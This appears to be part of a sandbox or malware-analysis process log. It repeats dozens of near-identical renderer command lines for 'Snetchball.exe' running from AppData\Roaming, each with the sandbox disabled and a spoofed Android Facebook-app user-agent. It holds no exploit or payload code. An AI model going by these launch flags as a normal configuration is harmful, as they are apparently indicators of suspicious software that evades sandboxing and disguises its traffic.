C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=3976 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:108
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=3220 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5204
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=3164 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5560
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=3844 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:988
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=2588 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5260
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=4216 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5376
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=4200 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4216
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=4168 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4380
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=4052 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5876
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=4140 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3688
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=1204 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5420
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=4136 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1612
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=4052 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:6084
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=4076 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:6020
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=3816 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:6052
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=3964 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4204
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=4128 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3376
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=3852 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3976
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=3220 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2360
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=4116 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5100
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=3156 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:456
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=3816 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5776
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=4112 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1056
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=4020 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5560
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=4176 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1520
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=4140 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:988
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=3720 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:896
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=3796 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5376
-
